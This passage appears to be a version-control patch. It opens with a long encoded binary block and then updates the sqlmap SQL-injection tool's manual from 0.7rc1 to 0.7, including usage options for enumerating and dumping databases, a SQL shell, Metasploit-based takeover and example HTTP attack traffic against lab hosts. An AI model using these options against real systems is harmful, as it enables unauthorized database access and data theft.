z$9Sq}Okc(|^NpS<&IkG-P{PO*qk*lr7&qeW&w7zwCI+`8iTWt(N`*d&9Fo&&F~8{-JL&Emi8#!9lPk5EizN3eyam%-7{|;#b(k6|2cvrpyfoBfeo;9N%R7Gl%gaCz~-xC@UgRBP|~? ze&k6DW_B&3kw3&;(63=^&w;)A#`f_r;tm%trRzsW4h|hWu;&m&@l(duax!W&w}jww z9nm<0Wm_II?j)xrlVK6EiY8Sg{KrOY$@29@nsf+Qn~O9X5wNxtiTic9g>21+%XLP* z)rgB!`}-rrJC6(cA*4pg>XSxDi;(q@973qxV&HGw@mcjAM&Ubhdr?{AF~fNc*daV(4Nd{a@dP;%PiE3 z`A0>JYScrQJMr>I^57`u87`0VD?X+-Q&@!np8RypoZbfuoZQf(o>OhmpsFvEMgAJZ zV7&(zxlG#CLTb(c3}B;;|UQY^EO ztg3_5>{#Xkc@%(OKC95sgMrL-QYsLc{~N^YBvtDnAuSGr7ZZfIu))kR(k~dlmNZA^ z@FC0#a=bpWw2NmBk*^Jq@NNKOB;6C3Z6tpqB-A?y(jLr3ue%Rr_L7E;5f}K5;pY&B zG?7_F`ZPf?ex@N`VS+E=)gyC~!1UOr$jpn<`pL{$GO-!*oxX}1%$&b-APxtQVUCi`VaUg`Jz*@^-mM+- zg^pu#NqBqw>O7u#PRev(+|rAKgfSB!=Winu& z%+Sfu0;FXpwC114sL7#!nKh(tXXG9}g*lQQfggdlQR&F37?X<;pkm8njD*K>h9d)} zG1thLF38ehI55IEJm}Y|EOm`%l{fyq1pT+DU`)TlAan6gB zoXuPzX^{wG3jHA=J@D(*d*ln4!)zqZJrRVw$RS^QGOp?A%vqv|0s;5and78GZzNs_ zMu&Kg<`8BpN$P{RGoP)4ogN1gbLN8VtZ0yvF^~C7vic&&&nxJ_mS7j);;xut^1!ujF#w%p5-Y%WoQy`X0@xQuqo{RYQ5gZX{4Mm%R3xtQ8ck9X zNHB?Y1M?Yi3s@ilz|UwFRTJ(48-@9$5{~rK07w925VDy-f^e)JDd@9_za?Oyg>baq#Gl9K10X>-AxBd{0xoe|YXAwt zAvc-=62voik(fy){%{;$0Z71=aBCTmAZ+2I4CanWJQxs(xnnee|3W^D99-aHfKEqo z^e|XP^w*jV)6pbOM=T8!e{_Jhilt%VKL^YQ&?+9#6UtB|XcG4Tc_e7!cll^WwFLui z!lDziqVrgFVhFt#cLh)o-RJ%Od_jz}NpwCS4WtN;2U;mc+JvPi)&gP#+n%Ojs7<0f z10f3rLbyoJCxRHkZ^4H^j9_!|ArK>2UVI3|2)FV15Qq`Xem(?Zum-KoW6VuhgklK9 zU=>A0b#^ z8?<(jVUWXs4Bn*Xc4j{*I~;QO=XNGqMQV>g3Q*VzQe-3|)w`HBD#DDy&$*dQCsjH= ze3j|AhcT*%V+yM5lfimtTJ|#aRK#;MN?zT^+$HKU$aHc)Q&mNDV;Q$y2boGLQfr(j z;Cmcmo{@&*5j^Mtdu?(S^N|EiK;a8TpkenP2E1xL5jDURY^Ne&ldLJ}XMj>_9%D9; z+LKZC)iFSy#D9?p0N_Pl9f#EyH3h{^pI}OLgc}l(_nECcBQ&C0k%tXrHvEWGs70vEi{qZopR z5WLWnFa$M?O%jOUg`NZ)sA+7Hkb@e-YLfIe9%MmC6#Z)GIFqQXn?PDZ=t*Ei4K-(y zpb|BWO%hg8Q=un;C0?#s(Gq4EaaqMwAn%F+I4^n5WE20@n7zeHU=eP4!ThIE3r6g$ zmrMqJ^JXA`w>L?7#f&2=2L6-MubGud;(b0azH}u28`xc^wxXI&D#BkZ`>ZJ2FqnVV06!JCUW{JD}t8yAbE|o>@!AW#ZS%_sk9Q zX*Ygd{Q#*HxEH@#d}3CTtbHf}gLMVjz8`VyXIN!#4&WC+`BPH)5K;^5VZ1WmeSzso znr1O>nZ>>`UMe!;Fyorp>KoHQMdFVj|6dpM`SN$zG53z5(C#0=?$?gt7raSc)&%E%9aaWO@Cs2ep{P_O){eggdbP~C57vX$}|6gV~S$qmv;0o}e%ql>Tr9oOZ zwjIejjd(~r@3hbCXR`eaLKXcvUs|Xs8REd!B{$C^u5@8k#FzZxz{Zmz=McAvWp|V2 z=h4hCj(tl4E+FpDY%p|9e)cknxd>r6(~*5j`e!4{T{8>=p1Okt*j=Q@CB*qZh1B2S z#6BedUS`}fHxy)5D)Q_K%I&R#Ugi{Hf02UMAh{iipvcW@C^GXf>i7wEv4GVCET{3U+*u0mJFmSwMzy06fcxN__!!n{TTY*sJQy*#^*?59DP zeLB*+0=t|ndxK!bilA=MTd)N_KvqSD=73P%aEqzLJ|;Eap{~0NpwMPlW-~~s_b37b z54LX=_B6Tjo@qwXtD>%~4@kg5xIio)@rzfO-Tz_F5aTBV^9BVC*CRWtvkBzgC$w3w z1`AVf=V!FZtH4Q~>~E6sg(;c2uqI9Uk&BewUTCV;H$=|$W=pHc?C*&5AC3X~Hy$w)e2X_m|Zpi8r44gg%5DYUm* zcC;Z8{Q*pxC1ef-YL;+5prl#C`Ba-qs)K4%NpnzbDk%=CGbO!2b*7{?sFpNYL>Nug zq@*-prI{rg0#=$?vLRrYnI#(nrkGg*=`h925}JpxZkF&mOfj`3@EP-@rU$cnOEs@|M zeSS?CSMbm*L3HrYEFpC8&@2IT@X##bb7)?(gwDZ2vjomDgUu2)$2>Dj#y1qJnYRXc zyaH8fmdrt@PP1eVLRXq4BOR*JEE(z0lxE3Dr^b`n##N5mB`clc2wd%!007#O>~yui z1wD~0bqXZt^PwVEK;xp_QU5K+qezL1_jBvWv-F7OC){ zFC)D;{K}}ut|z_oBTH-$GABFYmq#!=kHi;X-KpxUNqz>id&v+dB=BCD8GHQIQfJ_<1~nB`V@miFM12>&o_4kv5f)|4%%+>)xHcNrJ1ef{WKblFcR|Rgnm2 z&?P&YT^k(dGGk%K2W0* zYa-an3GioHf7Xd?k7h@cm0ly0eDqv(6L;c%*5ZA3gyM|ox z#jh*z?5QAHf$~vc&AVR$bvunGO1J-gHbA;%}x(w-7>)|poQ#f z*df9GrZ)*5%Kjnq>Y*&}Vogb8Uyx2gtZU|oBo^jj;b5fj1fx6W$lhSo#ZQ$#!`Oex zuKK8P(Qvk^iX3Tx_INDNzZ6(gXe6fGW{QJQ*oOpZrh^DBAjAl82gl71;bqs5U)!H0CQKgqE^>L6D1aunDrUv+nB2EGUkWp6Al7|9d z@kl-ot2YMJ4mt%PQ3X=nFPU!;|LC^Z9>hOF zVtWw(2#M`M{39f`2l0=Ph%F%g5fYk%feQJLpx7S7KSE;XA^s5(I}Z_$Jz=r)5b+3! z#6ZL&BoYG=kB~?VbUH#JF;MCVS&4zdrwvN#7J3~akr*g;ghXPX*%119t>~bjo&bbJvZz8wP$COVM^GXQTt`qM3v5SFA`5&+P$CPA z2Wb*n;5>pNS)Hj~M_8f@yhl)E7S-$sN@Rii2ufsu{Rm2Af&T~!WKo|%_f~BA%rn#2 zaVpXv6e6YP40eW!q_&1Mf+NiA+z;iNanqy^HbSm;@u9Z zydr2f2L{@{_G}QTpT_-cQ+iFFqDTmv7a@5Fn-?K@5Stev zBF44=s?*h(2eNsgk%zK*p^*o(d8v?xvw5jt1GFjk@{l$!74o1qFBK%$CUpy{{o6?< zDn<8Ty(k9+F(8?#6yGB?PYlp?FPW+o#Um()0lLt?C$Qzomq6B+6urylC)M|{14&>a z=G%sS>}=8}3G?@m2i#1f_OqWzMlyo@p_1(fu)q%tLp~fV@FD{aVm(bB&bpGOhu9C~ z$O!!6*XOV-ARyH!0NJkO`$>RXHCaa8{s7N4$;DIfW9^!T zB<$$()fFaJPP5ZVs~L#P`iZ5u{0w`Me42?M@9Nri7M`5Ovq2(%EaUKh2!^L3IPeHW zL-si~ow&|Hkl%)1a~=?sNkdum!iVg-fYiF_2zI~79w3Vee!X3aHo9c9r^t8>>qo*a zv1xTg^_I6n>2?zjU~E>X+N$YnRw%|Rv)W}A-!9jX2cDcK>3RhWO?~F3iydG0jexTQxy}FDoZhl=|bnd7=*flo}fVs-Fl-d zf@(`K855OiOEHLfO0}gJ1cjJ;QjjM@(sgvbAX!SKWJwT(CLkn{g#-)25?yq`&}Cw6 ziKN=NQGZM)D9L?DOpymVmB`IAPx?OTw}kJGKAkDW{Iu0id*IkBW1=SW)KXUCCOYmr)N6z2Pk0$c%7 z_5r(-zlkXvyDIjOJxsoDphP{yy1BBEg-!X0YS*?ID2Ky3-ULq({>H-_tXn1=$VhS8 zil1$tu|X=5v<;bfAM};y>=nZ9KoEz9KEbBq&mv)S&WpTz3BNV9kTUnZq8jw;ZnlVU z2(IuOb}zCXrl-knzkxkR_Mw7iVOTv!--6D7{ZM(+b67tWi95iS#79lGpw5F~7Q z&#JNSc?iVwD53I49wlTUOcmmqKA!*@8Xbl#;kP^2eg+xgN016t?47yn3)@IV{EwoA z-?`Li9&ikGdVOO9RHXTFS)?P9up25SRV}Kt!Hl-FDvRoY0Z8Xz`DV!%3W!|5$f=0@a(; zXSm~J#yO-^U};M4^GLz`sYxO^?mUUVfKKpkk_ATqU54l9Qc3fRXn;2mTRC!nNV#le zfz9nhW)|Sq)14a}R;9LeCWGVp#03YMi2o4up-Dk*wSyYBap@sISnuA%zYuqYY`=!` zWeRg^$&u^$g&hX?ONwxZ$;BH8VqfC|S$Pw`AnCr5ai@aQBg!R~R4N zxKkwiKC-~O;Z1&)!*ZJP&T)sfcnJFVO%t z%&{rG`W1-61oXoO5E9dLIG}-`SSid0ghWvZ>jBk> zLYOKXwPaDjc0foJo74_hOOTHOM|B?LqYX-sj{--v2w(vmEi@=nLy;rCwrG{b6gjFT zeMgZa?yrbxlo(0hQ9E2M={wlrAY0TdaC#sl>N|=!)sn#l%m}q28C+C}swI1i;!m|? zZBe^iEg4%BjjAPEi<;$X$<(4|xmvQcC{k5RUUI-igv4P2TEqbv$zefZtXgtdP@7#X zIV`Bnu9h4Y)Mi&p4hw3tt0jj8wb|9Y!-AgUp(eXp@>fukT`l=5C`wRUL_bj^#m%^s zV`VV4+0~LOoZ9Sa38+(>T`d81;C_U}Da(Tm38zyFUM=Bt9(qVPoj2gs773~I7Q9-5 z>bwQ7w!!L@b{niti5IatfC(ku2C7r)ZJ;_O-yW)~tx%oc_NP6t$LeZ(tgg1l>hw;P zh!-eXHc*|CWdqeISvF9el4S$cK~{U*w36zg+_GYIfGujlt0nu3f)WJ91;7J)wPb-& zc!^YjEQ<4QegMwLF7z%^{SyS*D}SzwibQ{AT{EHE;#4H^3+qZAXt_n?MK023>o}a2 zasP%$9>*6mKxp>;j_e-{TrU+5zBBupxNa)a<0mrJs}6Ztpca=!R{lb!JGHp(IK%V@ zDR9z%bM zK#=bp{_>O3Lnq98+j~@{t6W91?7qdnRz{czkF+a zt>loesv=*Rth;)F(RkaCm#ui!*;?4zO}(HDJ@kT#B(>vI|M&jt1)-0xCJFu03!L}R zTlt_DgrtXF5PG)#)#ENx2v?EkVhj8J>IKQ>p|^5PZ{?a^;F^ct$`8G;i0x{n=Ox5} zZf-SB{Dgtl3%b-pFQ`8cgRl_rS0LUX*i;?{VaeH6YtWEcO*yX?_7xfgvONp}M!;Wz zr3L{Ac+js-(V1lsW{zEjI^3rc=?sunD`-m;6DE&AP+zzlXQflnF1Q@Wj~oeX?@)#; zYRXlV_19pXd|qe3EdE;S6Zm3F9v%so2B)q)b>c^8wjxF9=FZPwN~Pw4i;JWNRa?ghXJt){a6e7!oItbvy+J1qR5< zKtY>&Sl=^4*Z&9Q8lIzG26I8{bflf(r-#T0d$RC-wC1fipJG~3T-P6%0InHR4^%Bf zT6N?&;5Mr|4D!&5m^zQQR_Pi#IBKYeMwszrQY)@bdC|MVr-*Q?WmHl;YSEG_t+=`_ z8WAm6OXGxFC>L19K33GPv?#gQigP71LpeVOOr67_Txa^XLTlmgaQr1tT5~OlUl*vS z>1{X{XMR8m`n8B05)bn9B%=*imV~vz=3Z_a&YARR3qS6uHe3TIKb|y=!I?5v?(_dsf+KjiKGMN=YGxvKn8V<@KSWCNSH^y4pJ-ad1(jH-q`GzOPaAo1F^caD)LI=3J zmiA7t{=`;j?*y|>j6v@V!txel&^v=w#0>G-N+>G+y$`m00l z3|9GVEr8w`1bAg_MTg!Q1Tibdpc#W;9E&mNoxzG5to5Kr1}(lonF7`REEaQmkF)KZ z?yf@z4T5|WE1?~<;s|Rcw1a|KXw5^Xz1`H((+*m}hEPaP`=sZmw7-K^ZPQyl?VD9I zSo6}p36Ml=fc8zWuf!PIH$mcwF|==j?IXs}&X}yzSv?4B#&oW zYO%(kPMuxn4YX%=Gr)kJ8STc~fF9x78p812M!V#6aa%5vVsRYXMfk9WxEKxSq0x%< z1TGlRL!;oA5QzabM!}^b#-N8r!F3|Wpi@Sjmc+$z;4?m?DN2o226WCS80FTyD6F$v zm?*0gtXgXh6w!%H9un0vzVE=;nu2^aki$c`k|ZIHD_#P*YFJZ|$m>aR&=skWl}_Z= z5Uy#}ybS0AK1nSI9kCDyp|1v1jOW}d`hs~zvl60{s@QL_xewqOmf{ zrL@4PQmHMY^E+rvBq)h!MjXIrhc)-7YLm2^zvdQp;!lLyIMe&U_XRpm=D;0jNSE558M>k=MA!Mv$L zdL(l_NPAk=cNkZbGNl3zDA69EkV#&MUt3j3zhPW&(r`G0Xzk%v3K^|0wNNn?gxNQ3zJVN9$Jf@ zQ~}%qg$gz*eh9`Zeh82TKLjO?9|Eqx4->^LYGSU+6*WpVh=A6r6R>M1;3oVKfB}Ap ztq5A8OoX_ItP5Kj240fLX|&o1s79p7Dx44_taFx z4{l$PV8N3KbHxfw@Iz#aj^}e_VamEymk$u{gj6(Ov>%)1^0DEujiQv;IV%=|A6fvQ z_#v`buc1Ryj#Ra9#TnE}{`dhBH;5V%KLpfUeV}S{21r;p`Ee-EP35lz$Wpasnqqbh^FGKypk&H_K>$U6;f2eN=zpV@HEcEYBXjY zNq)ptCJUx6&;G!-{e6#c~po0{C^Q+3ozmz9O0 zBtEH_{qT=dEhd^6xLF0WtR%~yk1Mn&jDRpezQoH ziZ>TX44=xYds!;pEFuSJDtu}RZu!H-NQ$I!wMr^SA7`Z1q)QrSbi;a8t_@OYBD@a! z(>Tvk+W*mE2x2VRH0TL_TUJIC#q=TRU=~)&|7aOKCX3QRGaTniZoq#=-qKXqEb;}7 z9a6KI1Q0%zZtdAMj8u(3nMObr@8Fju;)*}HON;9C6t2ipjcR}5GnY?Qh(>JTLadIQ z%l%`aXvVgr8U``d{kCyhYyivi;RrOpEo_?)aT>YILVZTM@nM?}_35l~5huv4x*CPG z)bnGTk;YNCg>4+IP~HeC)KU;+n-67m6n@I$^wbc|iz|l%;RXnES;MGMgX0_r=7B?U z(Wy4TfVZmz^9_6JbW1m{V*1Nqq@GiGoP2JgKBGdlVdvfoW}Iy~gojZ`+OIR1i_Z5+07`NvFb<4_-ehnmI}%^Ni%)!!})xXNX)yKAD} zJXs+;AwxnIaMdjQHlA%F+Ta18Z5&$ReGs;BIA0G_!@gp~X{l$)HXp4|IWl<3g)d7! zfJh64+p;oBK!Y7$YChQJLwh>vP?5#ysc+pj4ja$>PK9k8`h+FQ=d+#fcsWklDZPBL z;sOD`m2X=i;`r?|SscDzZchyI@mJ#W@>%c`yZnlVv9(XVa(Nl~d3Iu;J!@e*?ro1P}W@TaCdcZjbxkN>M{8N3h`pk5%mHx9x6Bpaa z)Duhp*~Iats4Pw^SAZ}?cwezBAHOXli{sx~vWWx#Y3CHIri)8Xj8>u5QC6=QW1L2! z8*es^&^Gv2WMpx;0fZY9_K`aNM2UTz!9ZWHpC+X;tfA7#Bmh5UnyvV8pAWcxV0 z=%gSJZz9R`CB(BXPf(J8m7Jpm@{R5=$f`5SQ3Q(e4_w&i!>c8V*@0`_3LfAtw4!Se zTi`R#guF$E`?bo#{M%l34db95-DZ`=@uz}haay@mjhjyRn6y;Z!aD~LiAQ3kNHLCo zVoFvae|_IR4)RDgRUtvOiopb5z&+haSF)?nX3F~mj-e|*Ni5u-tlQc;+H%~h6mb3;txqk z^^xw=Io1Ns$YC$WQ>TEjS}n{>k}YtdC{#KO7J6{NzA#J-1!w+;)d2^V zBA*_(+=hev_yZvDZ^+m;f)!+wk*5GhJrt@Ro(2Ur!HiK1C(d0cJEF7jSBUK!#>oLW z`{656HiG9(W$eeba&$$`Er@&hT!7zQSas-s9{cgKi?U(JVtIu?Me-$vLlp{rg!6+6 zm5!(G?T{wVe*-QX%BZHEI0bG13QO>cs!u`6|xE< zK<-9^F{V=t6I}iZ%z?8P3W0}yy>a*rAsG0GkC@Y3*yYwUUgrv}}ilf^;C zDdPAi1oHAx{$t51;2riD6c_;~8R_xWyu$cpguhk36yXn1s1GB>ck;53>39N1R-ul+ zo-S*IKOA8n2SZTSV=Xj~Lc&2rDFhc@ofqd!o_&q88}#_BeIpns`O?9|zl!;RSAG@4 z1b>u5_&{CCtWEGAO(8oc7Ako^$pie(4%`9B)Aaq?J%jc4E}B{YOLmL86@>m6P_ zQ=lO{ex;1VjFYh+ZagKR!HXRH6WOvx6dMF^#YsLfQDNa$u}RJa_yu7@*%OU8#lAI& z;qSrm{LiaUIi8pc8oAX?or?1HPM^Y%i*GcnrB@PcJBPCTRWfUwfd2rH`17px8DRv; zCKn1T04go3aM9zAw|ptWo5|mcuy4ZxqGijDUJ#c_DeCp)pFFiIOs{$=%kpog%kp74 z$+!UK^P8GYkyBznHs|E35*Gyd_i5}a#FnQ_NMY|VZU@W>Tz8W%dtADKG?llH>m9Ob zf|1tB7auNAK|RXL;sBwnEPR8!>am|rxKSs!SdmeoD$odjFUG!)c=1(1Gz7My-|#Kw zEi~(Nf)~feeZ(7eI91QTNMzrL2m@^f0sGE!#D^VMjbb%p%igA8Ya5jRa@OFilQIql zo_y+Pbo{eUb_7C(%KhCgs00o#3#MqdR)sM{YpT!gBS2xxgPMwjB548aN-MlaaI7oL30PwaPX*o4R!lf>Uoly=^eU!&f&hgm zxBvq~vFf!jobx7Wg6$PUk4|qd@kS$pJE~bgv*UD zwT`IMsBZ@T3pq`&DdhVgz)CiVLI4zSBP*v9T+4E31YrntBx5+5rQniZOwx3sXBFfl z1DA%}k&K2Fwi;aD3MUsv8q~-dhVZh{3RYoC-51J+73WAG`4k5Xu%!4S>vmHSnn$5t zp|#{^1k`#9Mo`Xv+yYUoNWBgcR^AgBvGT=-vWgjjQ)6<_h}+%#jR$|yB$F#_f&Wr& zc0jM`70VNrs$zWL+g0WRkdv<_U=X?C25iA^E7?y1J&t+FyK2DuX7U+?iy?AIiai3w zehlJpVoAn2EE^l;X`KX^Qwn~4JW zWJ7{Iay#7=4pK2e_*aDOsfNs#FGWll#VVn5OFr&!z~Eib!v~;aY=)XvkEzJN;BD6w z9N~(o0|%O74d5t?+)Ik32T!xSk9a@Y8YlUGkkOzREqstjF-_o7R>&%NXXSn(9Dw9s zRI~304#C>15)1aMafegB!m%5t5D)l3kKFwRFeN)51`gtzI|@kvOJ456!8W^2gD0RV zfq7F5C{@W;tZ;j((FhDt`P9J|t>jyS$j3j`Zr=vBzeEin`hW09g~D@?9!eK_mK?0nZR2;lQoK~SRscTHp1~j!|!J`X`!Gj^L zK0Wmm!Cf6xIUi8`KEUrW~d*YEDpDL5D0yBx+iP;Sn%U#0oPUF>Ed5e$;$~dKI zO$}U`f`KoHe{t4UA|Q_UirCF=L@I70P)Cw%FklA5mmup8;^b1A=2KvC#M#=J0#Jl! zh<_c)osF^+ryME0CPoB|rdbBQ%1&j&L~#zBogixUYZQt1drLMDFjl#RmN zN1S5&3UP{qbco|W#$?|gfGowxKzz%W7+O`FQ$w6$V-E+Lux~8yB;d7d+0g?~a=4B- zxlrwo;lgQh1$TkbWJ?1109EA;V+UKoacFo&K77s&AF@9RhAXP2n*j1^=_Y_8j(@Vo zp1E*{%Lf-`yNzASV{Ewd;9wEzs~{pode%z5JT+?a;RwKRE6}LBex_ z2#d!3fScigYF(iGrfe9nI+&d=!F-v<>YlHDFYLM$L>;_5wB@3vtdajs*ON9O)xMxv zBQn!LCc3Bv#JrNnkOb(2#>XyWmE?}4Ij=W2=`d7t*{bGQ(niHu0U|U((4Y~~<%==! zxrfYIN`>Hj_GKs4PTu*LktB=5)Z|Nm-KLr#wAWF`d^2>wHytL(FWs_b^M73;0@jQ=a?=31W&yhvq$ zh6t{r(=LyxNa(%L>I$rsTLKz9aS9Ya)CmHu-D0z1KW~^Ez&Wg>fFV2sG~r*N*%WN3 zN2Ppl!H%pGx9~)An=3&o8=imM)&k0D8ewLa^3d@ZX7^rduT+oEe zh1R}^wGyBk@+O@9VD46!S(2(GiDzbvyZ~IOb%UAJI1n)lBgbcnK^9{(dL`V;W(E;D z>0!Q2rwIF9B`R&2X4CHz`V-xJyf_l3Gb3Y=}9@jRptF zzqJJy|7YVsStQgLr^4xPXnk|UI6e$s^+yK;R~~9?-7NBHF3^&$Y$ITa*WaL*rcl z*P4fg!jx=PfqTVB+`mPsjux9H@hmC=!obxC;ie>|?ME%j+VdUwENc+WIqKenu+j`U zEOG!@aAsMrX&#YdMfFK1lDj+PX6&m<%;HuSo1SUeCBn@q3Yyi}9%Gtr#va5=nhchq z7^4ux9ajg7U7cyEGw2~uELgQiy#!O7dki4i+k~N6_I*(5d+PCin3TL;LXT)S>(WR- zsZKo0QS-P3A3dEg9K<0Y?kzT@D;+yZS4v#$3GKx#ptEtr>8>CeOaZ1Tq~})gpMia6 z+Q=IG%k;o_hx8H!FXf@CS1_L~Xiu`A;?_|DayQ(*RxF+cjzX5$k4lm9siIZCx>{W2 zHj9a_6YuuXdMLm+Zda=wHLOXzvVse!LjVjf3d z-kQ}+h31iX$FaJ0(_tw{YF4D6jiA(?)%1Uh3jo7RQ`1(Z8c|%${&ahHySQkhuHFzA zr)LgL28-(>+P7ubvS3^(PGI}q%P?+i*nl{I^m;)e!py8G$xs0>Kno&=v31n5Q>QRa zF5Kpbux0|1Bt4ML{6Q{k(@V$#h6hh#R={XzCmI6D_HddS|0g{UBw)$;P3)((B(CFCB$zV8AebX=p7A^)N3F%}ONIt_kXu5F+8c;9& z9te@7agH19O~-x?sI(bpM`{^bs!?jkB!i#t{yF>Ti0qwz_SMr8 for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the -page. The required version is 3.2 or above. +page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository. Optionally, if you are running sqlmap on Windows, you may wish to install @@ -348,47 +350,34 @@ stand-alone executable. Download and update -

-sqlmap 0.7 release candidate 1 version can be downloaded as a - file or as a file. -

sqlmap can be downloaded from its -. +. It is available in various formats: - operating system independent. - operating system independent. - operating system independent. - architecture independent for Debian and any other Debian derivated GNU/Linux distribution. - architecture independent for Fedora and any other operating system that can install RPM packages. - that does not require the Python interpreter to be installed on the operating system. -

-Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -. -

You can also checkout the source code from the sqlmap @@ -406,7 +395,8 @@ sqlmap is released under the terms of the . sqlmap is copyrighted by -and . +(2007-2009) and +(2006). Usage @@ -415,7 +405,7 @@ and . $ python sqlmap.py -h - sqlmap/0.7rc1 + sqlmap/0.7 by Bernardo Damele A. G. Usage: sqlmap.py [options] @@ -498,16 +488,15 @@ Options: --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables (opt -D) --columns Enumerate DBMS database table columns (req -T opt -D) - --dump Dump DBMS database table entries (req -T, opt -D, -C, - --start, --stop) + --dump Dump DBMS database table entries (req -T, opt -D, -C) --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables - --start=LIMITSTART First table entry to dump - --stop=LIMITSTOP Last table entry to dump + --start=LIMITSTART First query output entry to retrieve + --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell @@ -635,7 +624,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:55] [INFO] testing MySQL @@ -648,7 +637,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -668,7 +657,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -689,7 +678,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -709,7 +698,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -737,7 +726,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1047,7 +1036,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close @@ -1063,7 +1052,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1114,7 +1103,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1130,7 +1119,7 @@ By default sqlmap perform HTTP requests providing the following HTTP User-Agent header value: -sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +sqlmap/0.7 (http://sqlmap.sourceforge.net)

@@ -1251,7 +1240,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1272,7 +1261,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1455,7 +1444,7 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \ - -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" + -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)" [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET [hh:mm:40] [INFO] testing connection to the target url @@ -1600,7 +1589,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:17] [INFO] GET parameter 'id' is custom injectable @@ -1672,7 +1661,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id= [hh:mm:50] [TRAFFIC OUT] HTTP request: GET 